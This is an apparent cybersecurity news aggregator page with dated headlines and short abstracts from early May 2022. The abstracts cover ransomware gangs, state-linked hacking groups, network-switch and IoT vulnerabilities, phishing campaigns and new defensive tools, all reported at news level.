The Series C funding round was led by Bessemer Venture Partners, with participation from Insight Partners and existing investors. This latest investment brings the total raised to $169.2 million and values the firm at $1.1 billion.Security Week
May 04, 2022 – Education
Using PowerShell to manage password resets in Windows domains Full Text
Abstract
With breaches running rampant, it's common to force password resets on your Windows domain. This article shows how admins can use PowerShell to manage password resets and introduce software that makes it even easier.BleepingComputer
May 4, 2022 – Vulnerabilities
Vulnerabilities Allow Hijacking of Most Ransomware to Prevent File Encryption Full Text
Abstract
A researcher has shown how a type of vulnerability affecting many ransomware families can be exploited to control the malware and terminate it before it can encrypt files on compromised systems.Security Week
May 04, 2022 – Attack
Pro-Ukraine hackers use Docker images to DDoS Russian sites Full Text
Abstract
Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by government, military, and news organizations.BleepingComputer
May 3, 2022 – Privacy
Mozilla: Lack of Security Protections in Mental-Health Apps Is ‘Creepy’ Full Text
Abstract
Popular apps to support people’s psychological and spiritual well-being can harm them by sharing their personal and sensitive data with third parties, among other privacy offenses.Threatpost
May 03, 2022 – Ransomware
New ransomware strains linked to North Korean govt hackers Full Text
Abstract
Several ransomware strains have been linked to APT38, a North Korean-sponsored hacking group known for its focus on targeting and stealing funds from financial institutions worldwide.BleepingComputer
May 3, 2022 – Hacker
Lapsus$ Eyes SharePoint, VPNs, and VMs Full Text
Abstract
A new report revealed the techniques and tactics of the highly unpredictable attacks by the Lapsus$ gang to target the victims, along with its interest in exploiting SharePoint, VPNs, and VMs. Researchers have observed mass deletion of VMs, storage, and configurations in cloud environments. For rem ... Read MoreCyware Alerts - Hacker News
May 03, 2022 – Vulnerabilities
Critical TLStorm 2.0 Bugs Affect Widely-Used Aruba and Avaya Network Switches Full Text
Abstract
Cybersecurity researchers have detailed as many as five severe security flaws in the implementation of TLS protocol in several models of Aruba and Avaya network switches that could be abused to gain remote access to enterprise networks and steal valuable information. The findings follow the March disclosure of TLStorm , a set of three critical flaws in APC Smart-UPS devices that could permit an attacker to take over control and, worse, physically damage the appliances. IoT security firm Armis, which uncovered the shortcomings, noted that the design flaws can be traced back to a common source: a misuse of NanoSSL , a standards-based SSL developer suite from Mocana, a DigiCert subsidiary. The new set of flaws, dubbed TLStorm 2.0 , renders Aruba and Avaya network switches vulnerable to remote code execution vulnerabilities, enabling an adversary to commandeer the devices, move laterally across the network, and exfiltrate sensitive data. Affected devices include Avaya ERS3500 SeriThe Hacker News
May 3, 2022 – General
What Does the 2022 NDS Fact Sheet Imply for the Forthcoming Cyber Strategy? Full Text
Abstract
The NDS fact sheet makes clear that campaigning is important for achieving security across the full spectrum of strategic competition and supporting integrated deterrence.Lawfare
May 3, 2022 – APT
China-linked APT Curious Gorge targeted Russian govt agencies Full Text
Abstract
China-linked Curious Gorge APT is targeting Russian government agencies, Google Threat Analysis Group (TAG) warns. Google Threat Analysis Group (TAG) reported that an APT group linked to China's People's Liberation Army Strategic Support Force (PLA...Security Affairs
May 03, 2022 – Malware
Conti, REvil, LockBit ransomware bugs exploited to block encryption Full Text
Abstract
Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the table by finding exploits in the most common ransomware and malware being distributed today.BleepingComputer
May 3, 2022 – Criminals
REvil Ransomware Gang is Back in the Game Full Text
Abstract
After reporting its TOR activity weeks ago, researchers claim the return of the REvil group with new infrastructure and an updated malware sample with a modified encryptor for more targeted attacks. It is recommended to keep security shields charged up to fend off such threats. Meanwhile, the publi ... Read MoreCyware Alerts - Hacker News
May 03, 2022 – Criminals
Experts Analyze Conti and Hive Ransomware Gangs’ Chats With Their Victims Full Text
Abstract
An analysis of four months of chat logs spanning more than 40 conversations between the operators of Conti and Hive ransomware and their victims has offered an insight into the groups' inner workings and their negotiation techniques. In one exchange, the Conti Team is said to have significantly reduced the ransom demand from a staggering $50 million to $1 million, a 98% drop, suggesting a willingness to settle for a far lower amount. "Both Conti and Hive are quick to lower ransom demands, routinely offering substantial reductions multiple times throughout negotiations," Cisco Talos said in a report shared with The Hacker News. "This signals that despite popular belief, victims of a ransomware attack actually have significant negotiating power." Conti and Hive are among the most prevalent ransomware strains in the threat landscape, cumulatively accounting for 29.1% of attacks detected during the three-month-period between October and December 2021. AThe Hacker News
May 3, 2022 – Vulnerabilities
A DNS flaw impacts a library used by millions of IoT devices Full Text
Abstract
A vulnerability in the domain name system (DNS) component of the uClibc library impacts millions of IoT products. Nozomi Networks warns of a vulnerability, tracked as CVE-2022-05-02, in the domain name system (DNS) component of the uClibc...Security Affairs
May 03, 2022 – Phishing
New phishing warns: Your verified Twitter account may be at risk Full Text
Abstract
Phishing emails increasingly target verified Twitter accounts with emails designed to steal their account credentials, as shown by numerous ongoing campaigns conducted by threat actors.BleepingComputer
May 3, 2022 – Hacker
TA410 Group has Got New Tools and Three Teams Working Under it Full Text
Abstract
Analysts revealed that threat group TA410 comprised three independent subgroups, that have been operating globally since 2018, to collect intelligence data via phishing campaigns. TA410 shares behavioral, tooling overlaps with APT10 and has a history of targeting U.S.-based organizations. Organizat ... Read MoreCyware Alerts - Hacker News
May 3, 2022 – APT
China-linked Moshen Dragon abuses security software to sideload malware Full Text
Abstract
A China-linked APT group, tracked as Moshen Dragon, is exploiting antivirus products to target the telecom sector in Asia. A China-linked APT group, tracked as Moshen Dragon, has been observed targeting the telecommunication sector in Central Asia...Security Affairs
May 03, 2022 – Cryptocurrency
SEC ramps up fight on cryptocurrency fraud by doubling cyber unit Full Text
Abstract
The US Securities and Exchange Commission (SEC) announced today that it will almost double the Crypto Assets and Cyber Unit to ramp up the fight against cryptocurrency fraud to protect investors from "cyber-related threats."BleepingComputer
May 3, 2022 – Ransomware
Black Basta and Onyx Leading the New Waves of Ransomware Attacks Full Text
Abstract
Two new ransomware strains have been doing the rounds. The first, tracked as Black Basta, has infiltrated at least a dozen companies in a matter of weeks. Another one, dubbed Onyx, has also managed to hit six organizations. The latter destroys large files instead of locking them, hence preventing d ... Read MoreCyware Alerts - Hacker News
May 03, 2022 – Government
Google: Chinese state hackers keep targeting Russian govt agencies Full Text
Abstract
Google said today that a Chinese-sponsored hacking group linked to China's People's Liberation Army Strategic Support Force (PLA SSF) is targeting Russian government agencies.BleepingComputer
May 3, 2022
Data Breach at US Energy Supplier Riviera Utilities Potentially Exposed Sensitive Customer Information Full Text
Abstract
A data breach at Riviera Utilities, a utility company serving Baldwin County in Alabama, exposed the personal details of customers after employee email accounts were accessed.The Daily Swig
May 03, 2022 – Vulnerabilities
Unpatched DNS bug affects millions of routers and IoT devices Full Text
Abstract
A vulnerability in the domain name system (DNS) component of a popular C standard library that is present in a wide range of IoT products may put millions of devices at DNS poisoning attack risk.BleepingComputer
May 3, 2022 – Vulnerabilities
TLStorm 2.0: Critical bugs in widely-used Aruba, Avaya network switches Full Text
Abstract
The new TLStorm 2.0 research exposes vulnerabilities that could allow an attacker to take full control over network switches used in airports, hospitals, hotels, and other organizations worldwide.Help Net Security
May 03, 2022 – Vulnerabilities
Aruba and Avaya network switches are vulnerable to RCE attacks Full Text
Abstract
Security researchers have discovered five vulnerabilities in network equipment from Aruba (owned by HP) and Avaya (owned by ExtremeNetworks), that could allow malicious actors to execute code remotely on the devices.BleepingComputer
May 3, 2022 – Vulnerabilities
Researchers Reveal Unpatched Vulnerability in C Library That Could Enable DNS Poisoning Attacks Full Text
Abstract
The vulnerability is in a library for the C programming language — uClibc / uClibc-ng — that is commonly used in creating software for IoT products, reported researchers at Nozomi Networks.The Record
May 3, 2022 – Vulnerabilities
Two vulnerabilities in Accusoft ImageGear could lead to DoS, arbitrary free Full Text
Abstract
The ImageGear library is a document-imaging developer toolkit that allows users to create, edit, annotate and convert various images. It supports more than 100 file formats such as DICOM, PDF and Microsoft Office.Cisco Talos
May 3, 2022 – APT
UNC3524 APT uses IP cameras to deploy backdoors and target Exchange Full Text
Abstract
A new APT group, tracked as UNC3524, uses IP cameras to deploy backdoors and steal Microsoft Exchange emails. Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees that focus on corporate...Security Affairs
May 3, 2022 – Solution
Package Analysis dynamic analyzes packages in open-source repositories Full Text
Abstract
The Open Source Security Foundation (OpenSSF) is working on a tool to conduct a dynamic analysis of packages uploaded to popular open-source repositories. The Open Source Security Foundation (OpenSSF) announced the release of the first version of a new tool,...Security Affairs
May 02, 2022 – Ransomware
AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection Full Text
Abstract
Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. "This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys)," Trend Micro researchers, Christoper Ordonez and Alvin Nieto, said in a Monday analysis. "In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap NSE script ." AvosLocker , one of the newer ransomware families to fill the vacuum left by REvil , has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities. A ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortionThe Hacker News
May 02, 2022 – Criminals
Chinese Hackers Caught Exploiting Popular Antivirus Products to Target Telecom Sector Full Text
Abstract
A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX. Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka RedFoxtrot ). "PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity," SentinelOne's Joey Chen said . "Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products." ShadowPad , labeled a "masterpiece of privately sold malware in Chinese espionage," emerged as a successor to PlugX in 2015, even as variants of the latter have continually popped up as part of different campaigns associated with Chinese threat actors. AlthThe Hacker News
May 02, 2022 – Vulnerabilities
Unpatched DNS Related Vulnerability Affects a Wide Range of IoT Devices Full Text
Abstract
Cybersecurity researchers have disclosed an unpatched security vulnerability that could pose a serious risk to IoT products. The issue, which was originally reported in September 2021, affects the Domain Name System (DNS) implementation of two popular C libraries called uClibc and uClibc-ng that are used for developing embedded Linux systems. uClibc is known to be used by major vendors such as Linksys, Netgear, and Axis, as well as Linux distributions like Embedded Gentoo, potentially exposing millions of IoT devices to security threats. "The flaw is caused by the predictability of transaction IDs included in the DNS requests generated by the library, which may allow attackers to perform DNS poisoning attacks against the target device," Giannis Tsaraias and Andrea Palanca of Nozomi Networks said in a Monday write-up. DNS poisoning , also referred to as DNS spoofing, is the technique of corrupting a DNS resolver cache — which provides clients with the IP address aThe Hacker News
May 02, 2022 – Hacker
New Hacker Group Pursuing Corporate Employees Focused on Mergers and Acquisitions Full Text
Abstract
A newly discovered suspected espionage threat actor has been targeting employees focusing on mergers and acquisitions as well as large corporate transactions to facilitate bulk email collection from victim environments. Mandiant is tracking the activity cluster under the uncategorized moniker UNC3524, citing a lack of evidence linking it to an existing group. However, some of the intrusions are said to mirror techniques used by different Russia-based hacking crews like APT28 and APT29 . "The high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet set this group apart and emphasize the 'advanced' in Advanced Persistent Threat," the threat intelligence firm said in a Monday report. The initial access route is unknown but upon gaining a foothold, attack chains involving UNC3524 culminate in the deployment of a novel backdoor called QUIETEXIT for persistent remote access for as long asThe Hacker News
May 02, 2022 – Attack
GitHub Says Recent Attack Involving Stolen OAuth Tokens Was “Highly Targeted” Full Text
Abstract
Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature. "This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an updated post. The security incident , which it discovered on April 12, related to an unidentified attacker leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM. The Microsoft-owned company said last week that it's in the process of sending a final set of notifications to GitHub customers who had either the Heroku or Travis CI OAuth app integrations authorized in their accounts. According to a detailed step-by-step analysis carried out by GitHub, thThe Hacker News
May 02, 2022 – Attack
Chinese cyber-espionage group Moshen Dragon targets Asian telcos Full Text
Abstract
Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia.BleepingComputer
May 2, 2022 – Attack
Rocket Kitten Targets VMware Flaws In the Wild Full Text
Abstract
Iran-linked Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Users of the associated VMWare products should review their VMware architecture to make sure the ... Read MoreCyware Alerts - Hacker News
May 02, 2022 – Hacker
Chinese “Override Panda” Hackers Resurface With New Espionage Attacks Full Text
Abstract
A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country." Override Panda, also called Naikon , Hellsing, and Bronze Geneva, is known to operate on behalf of Chinese interests since at least 2005 to conduct intelligence-gathering operations targeting ASEAN countries . Attack chains unleashed by the threat actor have involved the use of decoy documents attached to spear-phishing emails that are designed to entice the intended victims to open and compromise themselves with malwareThe Hacker News
May 2, 2022 – Education
How Can One Know When To Trust Hardware and Software? Full Text
Abstract
The Lawfare Institute convened a working group of experts to answer that question. The group's report, titled "Creating a Framework for Supply Chain Trust in Hardware and Software" is available now.Lawfare
May 2, 2022 – Outage
Car rental company Sixt hit by a cyberattack that caused temporary disruptions Full Text
Abstract
The car rental company Sixt announced it was hit by a cyberattack that is causing temporary business disruptions at customer care centers and selective branches. The car rental company Sixt detected IT anomalies on April 29th, 2022 and immediately...Security Affairs
May 02, 2022 – Solution
Microsoft Defender for Business stand-alone now generally available Full Text
Abstract
Microsoft says that its enterprise-grade endpoint security for small to medium-sized businesses is now generally available.BleepingComputer
May 2, 2022 – Attack
Amazon Web Services Targeted by a Package Backfill Attack Full Text
Abstract
WhiteSource identified, blocked, and reported two packages that were deemed to be malicious versions of original AWS packages. WhiteSource security experts have reached out to contacts at Amazon to notify them of their findings.White Source Software
May 02, 2022 – Vulnerabilities
Which Hole to Plug First? Solving Chronic Vulnerability Patching Overload Full Text
Abstract
According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don't work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves. For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first. The reason? In 2010, just under 5000 CVEs were recorded in the MITRE vulnerabilities database. By 2021, the yearly total had skyrocketed to over 20,000 . Today, software and network integrity are synonymous with business continuity. And this makes the issue of which vulnerabilities to address first mission-critical. Yet owing to the countless documented vulnerabilities lurking in a typical enterprise ecosystem – across thousands of laptops, servers, and internet-connected devices – less than one in ten actually needs to be patched. The question is: how can we know which patches will ensure that our sieve doesThe Hacker News
May 2, 2022 – Criminals
The mystery behind the samples of the new REvil ransomware operation Full Text
Abstract
The REvil ransomware gang has resumed its operations, experts found a new encryptor and a new attack infrastructure. The REvil ransomware operation shut down in October 2021, in January the Russian Federal Security Service (FSB) announced...Security Affairs
May 02, 2022 – Phishing
Google SMTP relay service abused for sending phishing emails Full Text
Abstract
Phishing actors abuse Google's SMTP relay service to bypass email security products and successfully deliver malicious emails to targeted users.BleepingComputer
May 2, 2022 – Breach
Attackers Steal $80 Million From Rari Capital’s Fuse Platform, Fei Protocol Suffers From Exploit Full Text
Abstract
The attack on Saturday was also confirmed by Fei Protocol’s official Twitter account. Fei Protocol also offered the attacker a $10 million bounty to return the stolen funds.Bitcoin
May 02, 2022 – Attack
Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia Full Text
Abstract
A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652). "This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," Mandiant said in a report published last week. The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities. These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout ) that, when opened, triggers an infection sequence that delivers and execThe Hacker News
May 2, 2022 – Criminals
Group-IB CEO remains in prison – the Russian-led company has been ‘blacklisted’ in Italy Full Text
Abstract
The latest executive order from the Italian ACN agency banned Group-IB, a Russian-led cybersecurity firm from working in the government sector The latest executive order from the Italian National Cybersecurity Agency (NCA) banned Group-IB, a Russian-led...Security Affairs
May 02, 2022 – Hacker
Cyberspies use IP cameras to deploy backdoors, steal Exchange emails Full Text
Abstract
A newly discovered and uncommonly stealthy Advanced Persistent Threat (APT) group is breaching corporate networks to steal Exchange (on-premise and online) emails from employees involved in corporate transactions such as mergers and acquisitions.BleepingComputer
May 2, 2022 – Ransomware
New Black Basta Ransomware Possibly Linked to Conti Group Full Text
Abstract
A new ransomware operation named Black Basta has targeted at least a dozen companies and some researchers believe there may be a connection to the notorious Conti ransomware group.Security Week
May 2, 2022 – General
IoT and Cybersecurity: What’s the Future? Full Text
Abstract
IoT gizmos make our lives easier, but we forget that these doohickeys are IP endpoints that act as mini-radios. They continuously send and receive data via the internet and can be the easiest way for a hacker to access your home network. IoT devices...Security Affairs
May 02, 2022 – Attack
Car rental giant Sixt facing disruptions due to a cyberattack Full Text
Abstract
Car rental giant Sixt was hit by a weekend cyberattack causing business disruptions at customer care centers and select branchBleepingComputer
May 2, 2022 – Business
Smallstep Raises $26 Million for Automated Certificate Management Platform Full Text
Abstract
Smallstep says it will use the funds to invest in the open-source community, will continue to build products for practical zero trust, and will accelerate research and development.Security Week
May 2, 2022 – APT
Russia-linked APT29 targets diplomatic and government organizations Full Text
Abstract
Russia-linked APT29 (Cozy Bear or Nobelium) launched a spear-phishing campaign targeting diplomats and government entities. In mid-January 2022, security researchers from Mandiant have spotted a spear-phishing campaign, launched by the Russia-linked...Security Affairs
May 02, 2022 – Breach
U.S. DoD tricked into paying $23.5 million to phishing actor Full Text
Abstract
The U.S. Department of Justice (DoJ) has announced the conviction of Sercan Oyuntur, 40, resident of California, for multiple counts relating to a phishing operation that caused $23.5 million in damages to the U.S. Department of Defense (DoD).BleepingComputer
May 2, 2022 – Malware
Analysis on recent wiper attacks: examples and how wiper malware works Full Text
Abstract
In the last two months, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time.AT&T Cybersecurity
May 2, 2022 – Ransomware
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell Full Text
Abstract
While previous AvosLocker infections employ similar routines, this is the first sample researchers observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys).Trend Micro
May 01, 2022 – Privacy
Google Releases First Developer Preview of Privacy Sandbox on Android 13 Full Text
Abstract
Google has officially released the first developer preview for the Privacy Sandbox on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online. "The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview. A "multi-year effort," Privacy Sandbox on Android aims to create technologies that's both privacy-preserving as well as keep online content and services free without having to resort to opaque methods of digital advertising. The idea is to limit sharing of user data with third-parties and operate without cross-app identifiers, including advertising ID, a unique, user-resettable string of letters and digits that can be used to track users as they move between apps. Google originally announced its plans to bring Privacy Sandbox to Android earlier this February, followingThe Hacker News
May 01, 2022 – Solution
Here’s a New Tool That Scans Open-Source Repositories for Malicious Packages Full Text
Abstract
The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories. Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software. "The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?," the OpenSSF said . "The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously," the foundation's Caleb Brown and David A. Wheeler added. In a test run that lasted a month, the tool ideThe Hacker News
May 01, 2022 – General
A YouTuber is encouraging you to DDoS Russia—how risky is this? Full Text
Abstract
A YouTube influencer with hundreds of thousands of subscribers is encouraging everyone to conduct cyber warfare against Russia. How risky is it and can you get in trouble?BleepingComputer
May 01, 2022 – Criminals
REvil ransomware returns: New malware sample confirms gang is back Full Text
Abstract
The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.BleepingComputer
May 1, 2022 – General
Hacking Russia was off-limits, but the Ukraine war made it a free-for-all Full Text
Abstract
For more than a decade, U.S. cybersecurity experts have warned about Russian hacking that increasingly uses the labor power of financially motivated criminal gangs to achieve political goals, such as strategically leaking campaign emails.Stars and Stripes
May 1, 2022 – Vulnerabilities
Synology and QNAP warn of critical Netatalk flaws in some of their products Full Text
Abstract
Synology warns customers that some of its NAS devices are affected by multiple critical Netatalk vulnerabilities. Synology has warned customers that multiple critical Netatalk vulnerabilities affect some of its network-attached storage (NAS) devices....Security Affairs
May 01, 2022 – Malware
Open source ‘Package Analysis’ tool finds malicious npm, PyPI packages Full Text
Abstract
The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative has released its first prototype version of the 'Package Analysis' tool that aims to catch and counter malicious attacks on open source registries. the open source tool released on GitHub was able to identify over 200 malicious npm and PyPI packages.BleepingComputer
May 1, 2022 – Breach
Hackers stole +80M from DeFi platforms Rari Capital and Fei Protocol Full Text
Abstract
Threat actors exploited a bug in the Fuse protocol used by DeFi platforms Rari Capital and Fei Protocol and stole more than $80 million. Threat actors stole more than $80 million from the decentralized finance (DeFi) platforms Rari Capital and Fei Protocol...Security Affairs
May 01, 2022 – Hacker
Russian hackers compromise embassy emails to target governments Full Text
Abstract
Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities.BleepingComputer
May 1, 2022 – General
Apr 24 – Apr 30 Ukraine – Russia the silent cyber conflict Full Text
Abstract
This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion that occurred in the previous weeks: April 30 - Pro-Russian...Security Affairs
May 01, 2022 – Denial Of Service
A YouTuber is promoting DDoS attacks on Russia — how legal is this? Full Text
Abstract
A YouTube influencer with hundreds of thousands of subscribers is encouraging everyone to conduct cyber warfare against Russia. How risky is it and can you get in trouble?BleepingComputer
May 1, 2022 – General
Security Affairs newsletter Round 363 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs